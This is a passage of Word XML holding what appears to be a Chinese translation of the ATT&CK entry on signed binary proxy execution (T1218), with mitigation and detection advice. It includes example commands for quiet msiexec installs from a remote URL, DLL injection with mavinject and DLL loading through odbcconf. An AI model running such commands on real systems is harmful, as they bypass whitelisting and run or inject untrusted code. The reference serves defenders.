          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制代理执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="369B36BB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1BABF4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t>: T1218</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA0B070" w14:textId="3B776182" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008F7150">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9DC22E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E2F448A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66653633" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DD3B16" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t>No</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69309ECB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t>Application whitelisting, Digital Certificate Validation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0948CFDB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t>Nishan Maharjan, @loki248; Hans Christoffer Gaardløs; Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="495AAC92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00042FC7">
              <w:t xml:space="preserve"> 2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B8F67AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4788ECC1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可信数字证书签署的二进制文件在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统执行时，可通过数字签名验证保护。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程中，有一些微软签名的二进制文件可用来代理其它文件执行。这个行为可能会被攻击者滥用，通过绕过应用白名单机制和系统签名验证来执行恶意文件。这项技术对那些当前技术列表中未被说明的代理执行方法负责。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF75A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Msiexec.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F81D485" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:t>Msiexec.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indows Installer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令行工具。攻击者可能使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>siexec.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来启动恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>SI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件来执行代码。功能可能使用这种方式来启用本地或者网络可访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
      <w:r>
        <w:t>Msiexec.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可用来执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2E389" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>msiexec.exe /q /i "C:\path\to\file.msi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799FC3ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msiexec.exe /q /i http[:]//site[.]com/file.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012C4E0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>msiexec.exe /y "C:\path\to\file.dll"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBAA1B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mavinject.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D99E6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Mavinject.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>是可运行代码执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>工具，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>avinject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可用来给正在运行的进程输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F977F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983C7D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9661BE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>SyncAppvPublishingServer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07307950" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:t>SyncAppvPublishingServer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>owerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，而无需执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>owershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAA9E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Odbcconf.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344294E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>dbcconf.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可允许用来配置开放数据库连接（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ODBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）驱动和数据源名称的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具。类似于执行带有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>EGSVR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>egsvr32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这项工具也可滥用与执行功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F165E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE730E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有其它工具也可执行类似行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0C5E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="1530E57E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="76E57613" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5BEFAF9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00042FC7" w14:paraId="070CD80C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE0C2E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA0FCBE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>一些签名的二进制软件可用于执行其它在特定环境中并不需要的程序。如果这些二进制文件对于特定系统或者网络并不需要，可使用配置应用白名单机制来阻止这些二进制文件执行，从而阻止攻击者的可能滥用行为</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00042FC7" w14:paraId="6790BB76" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C901BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账号管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44540D58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00042FC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00042FC7">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果用户需要这些二进制文件，可通过特权账号或者组来限制执行，从而减少恶意使用的可能性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36749D8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005F4BA0" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CCCB1E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75990DC5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BF3093" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和签名的二进制文件的命令行参数，这些可能会用来代理恶意文件执行。利用合法程序执行可疑行为，如：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>siexec.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从因特网下钻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，可能是一种入侵指标。考虑到可能的用户和管理员的正常行为使用，可通过关联其它可疑活动来减少误报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB23089" w14:textId="64F11907" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>脚本代理执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="79208619" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
